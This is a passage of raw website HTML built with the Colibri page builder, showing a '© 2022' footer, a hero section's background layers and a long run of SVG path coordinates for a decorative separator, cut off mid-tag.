style-257 style-local-22-h15 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n                                    <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n                                          <!---->\n                                          <!---->\n                                          <div class=\"\">\n                                            <p>© 2022</p>\n                                          </div>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-212 style-local-22-h24 position-relative\">\n    <div class=\"background-wrapper\">\n      <div class=\"background-layer background-layer-media-container-lg\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container-md\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n    </div>\n    <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n      <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n        <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n        <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n        <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n        <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n        <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n        <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n        <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n        <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n        <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n        <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n        <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n        <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n        <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n        <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n        <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n        <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n        <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n        <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n        <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n        <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n        <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n        <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n        <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n        <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n        <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n        <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n        <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n        <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n        <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n        <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n        <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n        <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n        <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n        <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n        <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n        <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n        <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n        <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n        <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n        <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n        <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n        <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n        <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n        <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n        <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n        <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n        <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n        <path d=\"M147.8,78.4c1.8-.3-4.9-.2-4.5-.4,6.3-.1-3.5-.6,2.3-.6-2.7,0-3.2-.2-5.8-.2.5.9,3.7,1.5-1.1,1.9,4.5.4,2,1.2,7,1.6,0-.5,1.5-1.1-1.6-1.8,1.4-.2,6.1.4,5.5-.1C146.3,78.7,142.1,78,147.8,78.4Z\"></path>\n        <path d=\"M317,84.4c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C315.3,84.2,312.8,84.2,317,84.4Z\"></path>\n        <path d=\"M265.7,81.4c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C267.7,82.1,268.8,81.5,265.7,81.4Z\"></path>\n        <path d=\"M182.7,80.2c-4.1-.3-1.3-1-6.7-1.2C177.3,79.3,176.1,79.8,182.7,80.2Z\"></path>\n        <path d=\"M238.5,80.4c1.8.3-3.8.4.6.7-1-.4,3.6-.2,3.8-.5C240.9,80.6,239.7,80.5,238.5,80.4Z\"></path>\n        <path d=\"M335.4,83.2c4.5.2,7.8-.1,3.9-.4C338.9,83,333.8,82.8,335.4,83.2Z\"></path>\n        <path d=\"M118,77.6a10.17,10.17,0,0,1-2.7,0q0,.45,3.3.6C116.8,78,122.4,77.9,118,77.6Z\"></path>\n        <path d=\"M126.7,78c3.7.1,4.6.4,8.8.5-.2-.3-1.8-.6-4.8-.8C130.7,78,126,77.8,126.7,78Z\"></path>\n        <path d=\"M308.8,81.4c-.8.3-1,.4,2,.7-1.6-.4,3.5-.1,3.9-.3C310.3,81.8,311.1,81.5,308.8,81.4Z\"></path>\n        <path d=\"M246.7,80.3c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C253.5,80.5,245.4,80,246.7,80.3Z\"></path>\n        <path d=\"M173.5,77.7c5.8.1,1,.9,5.1,1.1,1.8-.6,3.6-1.6-3.4-2.3-4.1.2,3.1.7,2.4,1.1A37.48,37.48,0,0,0,173.5,77.7Z\"></path>\n        <path d=\"M315.9,81.5c0-.3,2.2-.4,2.1-.7C314.1,80.7,312.8,81.3,315.9,81.5Z\"></path>\n        <path d=\"M351.3,82.2c.3-.4,1.3-.5-3.4-.7C348.9,81.7,346.2,82.2,351.3,82.2Z\"></path>\n        <path d=\"M220.8,79.3c.6-.2,3.2-.2,2.2-.6C219.9,78.7,215.9,79.1,220.8,79.3Z\"></path>\n        <path d=\"M152.4,77.3c1.7-.3,1.1-.6-3.5-.8C149,76.8,150,77.1,152.4,77.3Z\"></path>\n        <path d=\"M347.3,79.3c-5-.2-2.6.8-.6.9C349,79.9,345.9,79.7,347.3,79.3Z\"></path>\n        <path d=\"M139.5,75.2c3.9,0,3.8.2,7.2.3C147.6,75.1,139.3,74.8,139.5,75.2Z\"></path>\n        <path d=\"M172.1,74.5c2.1.1,2.6.2,4.5.3-2.4-.6-2-.8-3.9-1.3C172.9,73.9,170.7,74,172.1,74.5Z\"></path>\n        <path d=\"M130.5,72.9c1,.3,3.1.5,4.8.8C135.1,73.3,135.5,72.9,130.5,72.9Z\"></path>\n        <path d=\"M390.3,79.2c-.3-.4,3.6-.4,5-.7C389,78.2,386.2,78.8,390.3,79.2Z\"></path>\n        <path d=\"M218.2,74.8c4.3.1,5.6-.7,1.9-1C221.2,74.2,214.3,74.4,218.2,74.8Z\"></path>\n        <path d=\"M177.5,72.7c.3.3.5.6.8.9C183.5,73.7,183.6,72.9,177.5,72.7Z\"></path>\n        <path d=\"M149.2,72.1c-3.4-.1-3.5-.4-6.1-.6,1.5.6,1.7,1.2,8.3,1.5C152,72.6,143.3,72.2,149.2,72.1Z\"></path>\n        <path d=\"M128,71.6c3.6-.2-3.4-.8.5-1-3.8,0-3.1-.3-5.9-.4C125.5,70.9,122.7,71.1,128,71.6Z\"></path>\n        <path d=\"M146.2,70.3c-4.5-.1-2.4.4-5.2.4,3.4.1,1.8.5,4.7.7a11.09,11.09,0,0,1,2.7,0c-3.1-.6,1.1,0,2.4-.4C146.9,70.6,144,70.8,146.2,70.3Z\"></path>\n        <path d=\"M431.6,77.4a4.41,4.41,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C430.2,77.2,428,77.6,431.6,77.4Z\"></path>\n        <path d=\"M407.6,76.8c.4-.3,4.1-.4,3.5-.8C407.2,76,405.6,76.7,407.6,76.8Z\"></path>\n        <path d=\"M315.5,74.8c.8-.4-3.7-.6-.7-.8C310.2,73.7,311.1,74.8,315.5,74.8Z\"></path>\n        <path d=\"M229.6,72c1.7.1,4,.1,4.4.2s0,.3,1.7.4c1.7-.3-1.2-.6-3.6-1C231.6,71.7,227.7,71.6,229.6,72Z\"></path>\n        <path d=\"M144.8,70.2c-2.6-.4,5.6-.3.8-.6-1.3.1-2.6.2-4,.2.2-.2-.7-.4-3.2-.5-.4.3,3.5.5.6.7A53.44,53.44,0,0,1,144.8,70.2Z\"></path>\n        <path d=\"M421.4,75.2c-4.3-.1-5.3.1-8.2.1a10.34,10.34,0,0,0,3.3.6C416.9,75.6,422.5,75.7,421.4,75.2Z\"></path>\n        <path d=\"M380.2,74c-.8.3-1.1,1,5.2,1.2C383.3,74.9,382.7,74.4,380.2,74Z\"></path>\n        <path d=\"M372.6,75c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C370.8,74.9,369.7,74.7,372.6,75Z\"></path>\n        <path d=\"M441.1,75.5a45.38,45.38,0,0,0,4.9.9C448.4,76.2,447.3,75.5,441.1,75.5Z\"></path>\n        <path d=\"M152,69c-1.1.2-5.6,0-3.8.5,2.1,0,5.3.2,5.6,0-1.1-.1-2.8-.1-2.9-.2C150.6,69.2,156.8,69.2,152,69Z\"></path>\n        <path d=\"M366.4,74.2c-1-.3,5.6-.5-2-.7C365.4,73.7,363.2,74.1,366.4,74.2Z\"></path>\n        <path d=\"M126.5,68.3c.3.1,0,.3,1.7.4.2-.3,4.1-.2,5.3-.3C130.2,68.3,128,68.3,126.5,68.3Z\"></path>\n        <path d=\"M405.8,74.7c2.5-.2,5-.1,2.3-.5C404.5,74.1,402.6,74.6,405.8,74.7Z\"></path>\n        <path d=\"M154.1,68.3c-.2.2-5.2,0-5.4.2,5.2,0,2.6.5,7.4.5C155.2,68.8,157.3,68.4,154.1,68.3Z\"></path>\n        <path d=\"M188.2,69.1c-7.4-.3-2.7.8.4.4C185,69.4,187.8,69.1,188.2,69.1Z\"></path>\n        <path d=\"M450,74.5c1,.4,2.4.7,6.4.9A26.64,26.64,0,0,0,450,74.5Z\"></path>\n        <path d=\"M142.7,67.8c.6.2,12.2.6,7.1.2,0,.1-.1.1-1.3.1-.3-.1,0-.3-1.7-.4C146.8,67.9,142.9,67.7,142.7,67.8Z\"></path>\n        <path d=\"M184.6,68.1c-6.5,0-5.1.1-8.7-.4-.3.3-.2.4-3.7.6,4.4.2,5.8.1,10.1.4,1.5-.1,1.4-.2-.4-.4C183.6,68.3,185.2,68.3,184.6,68.1Z\"></path>\n        <path d=\"M153.3,67.3c-4.5-.2-5.7,0-6.8.2,2.5,0,4.4.1,5.8.2C151.7,67.5,153.6,67.5,153.3,67.3Z\"></path>\n        <path d=\"M287.9,70.2c-3-.2-5.8-.4-8.8-.5C278.3,70,286.9,70.4,287.9,70.2Z\"></path>\n        <path d=\"M409.8,73c.8-.3,1.6-.6-2.1-.8C409.2,72.6,404.2,72.7,409.8,73Z\"></path>\n        <path d=\"M47.3,63.6c-.3.3-3.9.2-3.7.6C46.9,64.2,51,63.9,47.3,63.6Z\"></path>\n        <path d=\"M126.3,64.9a22.4,22.4,0,0,0,4.8.8c-.1-.1,2.4,0,2.7-.2C129.7,65.4,130.9,65,126.3,64.9Z\"></path>\n        <path d=\"M45.5,63.1a23.75,23.75,0,0,1,2.8.1c-1-.4,3-.6-3.5-.8-.2.4,3.1.6-.8.6C44.8,63,45.6,63,45.5,63.1Z\"></path>\n        <path d=\"M337.1,69.4c-2.2-.5,4.5-.2,5.2-.4C338.5,68.4,330.4,69.2,337.1,69.4Z\"></path>\n        <path d=\"M267.4,65.9a10.66,10.66,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3C264.3,66.9,272.2,66.3,267.4,65.9Z\"></path>\n        <path d=\"M49.3,61.1c-5-.2-1.1.5-5.2.4,2.2.2,6.4.2,6.1.6-3.8,0-3-.3-5.9-.4.8.6,7.8.6,10.1.3C50,61.9,49.2,61.6,49.3,61.1Z\"></path>\n        <path d=\"M411.5,70.2c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C408.2,69.8,409.3,70,411.5,70.2Z\"></path>\n        <path d=\"M127.1,62.8c-2,.1-8.6.3-3.6.7C121.5,63,131.3,63.1,127.1,62.8Z\"></path>\n        <path d=\"M242.9,64.9c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C245.7,65.1,247.4,65.1,242.9,64.9Z\"></path>\n        <path d=\"M254.7,65.6c2,.1,2.5.2,4.4.3-2.4-.5-.6-.7.4-1.1C255,64.9,253.7,65.1,254.7,65.6Z\"></path>\n        <path d=\"M408.6,68.5c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C413.4,68.8,411.6,68.6,408.6,68.5Z\"></path>\n        <path d=\"M312.4,66.5c.8-.4-2.8-.5-4.9-.8C304.3,66,309.5,66.3,312.4,66.5Z\"></path>\n        <path d=\"M214.1,63.7a54.5,54.5,0,0,0-7,0c2.3.1,1.1.3,3.1.4.1-.1-.5-.3,1.1-.3C213.1,63.9,214.4,64,214.1,63.7Z\"></path>\n        <path d=\"M345.5,66.3c-.6-.3-4.5.8.7.8C349.2,66.9,344.7,66.6,345.5,66.3Z\"></path>\n        <path d=\"M255.4,64.9c2.3-.2-.1-1-3.4-.7C256.5,64.4,249,64.7,255.4,64.9Z\"></path>\n        <path d=\"M365.6,66.9c-4,.1-13.3-.4-14-.1C353.2,66.8,366.6,67.6,365.6,66.9Z\"></path>\n        <path d=\"M149.8,61.8c-.4.3,2.2.5,4.7.7C154.5,62.1,154.2,61.8,149.8,61.8Z\"></path>\n        <path d=\"M106.4,61.3c-2.3-.4,5.9-.4.7-.7.3.2-.9.2-2.7,0C105.4,60.8,103.3,61.2,106.4,61.3Z\"></path>\n        <path d=\"M335.9,66.4c4.3.2,5.7-.3,2.3-.5C337.8,66.1,335.4,66.1,335.9,66.4Z\"></path>\n        <path d=\"M65.7,59.3c1.9.6-.8.7,3.7,1.1C69.3,60,68.7,59.6,65.7,59.3Z\"></path>\n        <path d=\"M56.2,59.5c4.4.1,4.7.5,7.6.7C65.4,59.8,58.3,59.3,56.2,59.5Z\"></path>\n        <path d=\"M59.6,57.1c-2.1,0-5.3-.2-5.6,0,6.7.2,3.9.9,8.1,1.3,1-.4,6.1.4,1.8.5,1.9,0,3.1.1,4.3.2,2.3-.1-1.6-.4-.7-.8C60.9,58.1,63.4,57.4,59.6,57.1Z\"></path>\n        <path d=\"M38.7,57c2.2.5.4,1.2,6.8,1.5C39.5,57.8,46.5,57.5,38.7,57Z\"></path>\n        <path d=\"M116.7,58.8c4.6.5,2.4,1,6.6,1.2-2.1-.5,1.9-.4,2.2-.7C120.5,59.3,121.1,58.9,116.7,58.8Z\"></path>\n        <path d=\"M105.5,58.7c.1.4,5.3.5,7.6.7A53.68,53.68,0,0,0,105.5,58.7Z\"></path>\n        <path d=\"M269.6,62c2.2.4-7,.5.7.8C268.8,62.5,274,62.3,269.6,62Z\"></path>\n        <path d=\"M151.7,59.2a15.43,15.43,0,0,0,4.9.8C153.3,59.5,158.6,59.4,151.7,59.2Z\"></path>\n        <path d=\"M332.9,62.9c.4.3,1.3.5,3.4.7,1.6-.2-.4-.2.9-.5C335.3,63.1,334,63,332.9,62.9Z\"></path>\n        <path d=\"M253.4,61c2,0,3.2.1,4.4.2,0-.1.2-.3,2.6-.2a9.4,9.4,0,0,0-3.2-.5A19.4,19.4,0,0,1,253.4,61Z\"></path>\n        <path d=\"M104.2,57.2a34.16,34.16,0,0,0-6.7.3C102.2,57.7,104.2,57.5,104.2,57.2Z\"></path>\n        <path d=\"M33.6,54.3c3.4.5-.7,1,3.9,1.3C35.6,55,41.5,54.6,33.6,54.3Z\"></path>\n        <path d=\"M140.1,57c7.7.1,4.9-.6.5-1C142,56.5,139.8,56.6,140.1,57Z\"></path>\n        <path d=\"M344,61.3c1.8-.1,8.3-.4,2.1-.7,1.1.3-.2.4-4,.2C342.5,61,342,61.2,344,61.3Z\"></path>\n        <path d=\"M88.8,53.9c2.3.5-2.1,1.3,2.6,1.4C89.3,54.7,94.7,54.3,88.8,53.9Z\"></path>\n        <path d=\"M193.6,56.3a38.23,38.23,0,0,0,6.3.8C199.3,56.7,198.3,56.4,193.6,56.3Z\"></path>\n        <path d=\"M95.7,53.9a9.77,9.77,0,0,0-3.5-.8C90.8,53.1,92.2,53.7,95.7,53.9Z\"></path>\n        <path d=\"M343.9,58.2c-3.5-.1-6.8-.1-8.6-.3,1.9.3,6.3.5,9,.7C344.2,58.5,344.1,58.3,343.9,58.2Z\"></path>\n        <path d=\"M200.4,54.5c-1.8.1-2,.7,2.1.8C199,54.9,204.1,54.8,200.4,54.5Z\"></path>\n        <path d=\"M306.6,56.8c.2.3,1.2.6,3.5.8C309.6,57.3,310.7,56.9,306.6,56.8Z\"></path>\n        <path d=\"M298.8,55.8c.9.5-4.5,0-7,0-.6.2-2.7.3-3.8.5,4.2-.2,14.1.2,16.5-.2C302.1,56,300.1,55.9,298.8,55.8Z\"></path>\n        <path d=\"M204.6,53.1c-5,0-.6-.7-6.2-.7C198.2,52.7,202.3,53.3,204.6,53.1Z\"></path>\n        <path d=\"M110.7,50.4a52.3,52.3,0,0,0-5.6,0c0,.3.2.5,3.3.6C107.5,50.6,110.1,50.6,110.7,50.4Z\"></path>\n        <path d=\"M308,55.2c-1.5-.6-7.4-1.1-1-1.1-4.2-.3-11.5-.3-14.5-.7l.2.2c4.2.2,8,.5,10.4.8C297.7,54.4,304.6,55,308,55.2Z\"></path>\n        <path d=\"M265.3,54.1c4.3.2,5.7-.3,2.3-.5C267.3,53.8,263.8,53.7,265.3,54.1Z\"></path>\n        <path d=\"M29.6,48.2c.9.2-1.2.5,1.9.6C32.3,48.6,36.7,48.4,29.6,48.2Z\"></path>\n        <path d=\"M333.9,54.7c-2.8.1-.5.9,3.6,1C337.4,55.1,338.3,55,333.9,54.7Z\"></path>\n        <path d=\"M113.1,49.9c-.4.3,1.7.5,6,.6C120.5,50.1,115,50.1,113.1,49.9Z\"></path>\n        <path d=\"M345.4,55c-1.9-.1-2.8-.2-5.8-.2.2.2.3.4.5.6C343.7,55.4,345.4,55.3,345.4,55Z\"></path>\n        <path d=\"M134.1,50.2c3,.1.8.5,4.4.3.3.1,0,.3,1.7.4C144.3,50.7,135.5,50,134.1,50.2Z\"></path>\n        <path d=\"M343.3,54.2c-4.7-.2-.8.3-5.5.1-.4-.2.2-.4-1.8-.5.2.2.3.4.5.6,2.1.1,3.7.2,5.9.4C340.9,54.4,344.1,54.5,343.3,54.2Z\"></path>\n        <path d=\"M281.2,53.1c-2.1-.2-.1-.7-4.8-.8C276.7,52.7,276.8,53.1,281.2,53.1Z\"></path>\n        <path d=\"M266.4,52.2c-2.5,0-4.4-.1-5.8-.2,1.8.2,4.6,1,7.6.7C266.1,52.6,266.7,52.3,266.4,52.2Z\"></path>\n        <path d=\"M165.1,49.1c-.9,0-1.7,0-1.3.1,3.8.2.9.7.8.9,4.8,0,3.9-.4,6.4-.6-5.2-.1-3.4.1-3-.3C166.9,49.2,166,49.1,165.1,49.1Z\"></path>\n        <path d=\"M356.2,53.1c-1.9-.1-2.8-.2-5.8-.2q0,.45,3.3.6C353.5,53.2,357.5,53.4,356.2,53.1Z\"></path>\n        <path d=\"M280.7,51.1c-3.1,0-4.9.1-5.3.3,2,0,3.2.1,4.4.2C278.3,51.2,281.5,51.3,280.7,51.1Z\"></path>\n        <path d=\"M304.1,50.8c-3.5,0-5.6.1-8.2.1,2.1.1,1.5.3,1.8.5,2,.2,5.3.2,7.3.4l-.4-.4a36.81,36.81,0,0,1-4.2-.1l-.2-.2C302.8,51.3,305.1,51.2,304.1,50.8Z\"></path>\n        <path d=\"M352.3,51.9c-4.7-.1-5.3.2-6.5.5,2.6,0,3.2.2,5.8.2C350.5,52.2,349.2,52.1,352.3,51.9Z\"></path>\n        <path d=\"M289.7,50.2c-4.5,0-2.3-.4-5.9-.5C282.9,50.1,288.5,50.6,289.7,50.2Z\"></path>\n        <path d=\"M362.9,51.3c-4.3,0-4.3-.3-8.6-.3C354.5,51.3,363.5,51.6,362.9,51.3Z\"></path>\n        <path d=\"M344.4,50.7c3.4-.3-.7-1.2,4.4-1.3,0-.3-2.5-.4-4.6-.5C347.9,49.5,339.4,50.2,344.4,50.7Z\"></path>\n        <path d=\"M363.6,50.5c-4,.1-9.2.1-2.4.4.1.1.3.1,1.5.1C361.3,50.7,364.5,50.8,363.6,50.5Z\"></path>\n        <path d=\"M356.6,48.8c.3.3-2.2.3-.8.6,3.5.1,6.9.2,6.9-.1-1.7-.1-4-.1-4.4-.2A4.48,4.48,0,0,0,356.6,48.8Z\"></path>\n        <path d=\"M341.9,48c.8.2.9.5,4.6.5C349,48.4,345.8,48.1,341.9,48Z\"></path>\n        <path d=\"M349.2,48.3c1.9,0,3.8.1,5.7.1-.2-.2-.3-.4-.5-.6C349.1,47.7,348.3,48,349.2,48.3Z\"></path>\n        <path d=\"M38.1,40.6c-4.5-.1-7.1.3-2.3.5C34.4,40.7,39.5,40.9,38.1,40.6Z\"></path>\n        <path d=\"M294.9,46.7c6.2.2,3.3-.4,3.5-.8C291.1,45.8,297.4,46.3,294.9,46.7Z\"></path>\n        <path d=\"M354.2,47.7c1.4-.2,4.4-.3,5.1-.5C355.5,47.1,350.1,47.4,354.2,47.7Z\"></path>\n        <path d=\"M259.6,44.5c5.7-.1,11.3.5,15.6.4-4.3-.2,1.2-.2-.4-.4-4.4-.1-8.4.2-11.3-.3C264.2,44.4,258.1,44.1,259.6,44.5Z\"></path>\n        <path d=\"M376.3,46c-3.7,0,.8-.6-4.6-.5,1.9.4,1.2.4-2.3.5a32.29,32.29,0,0,0-4.5-.4c2.3.5,6.6.7,3.7,1.1,1.7.1,3.9.2,7.2.3,1.1-.4-5.5-.3-4.7-.7A34.73,34.73,0,0,0,376.3,46Z\"></path>\n        <path d=\"M299.8,44.3c-1.1.1-3.1.7,2,.7C298.8,44.6,303.5,44.6,299.8,44.3Z\"></path>\n        <path d=\"M278.3,43.6c6.4,0,4.8.5,8.9.6-.9-.7,4.9-1-1.3-1.4.6.4-2.1.4-.6.9C283.3,43.6,277.9,43.3,278.3,43.6Z\"></path>\n        <path d=\"M337.4,44.4c-1.1.1-3.1.9,2.2.9C335.9,44.9,341.5,44.7,337.4,44.4Z\"></path>\n        <path 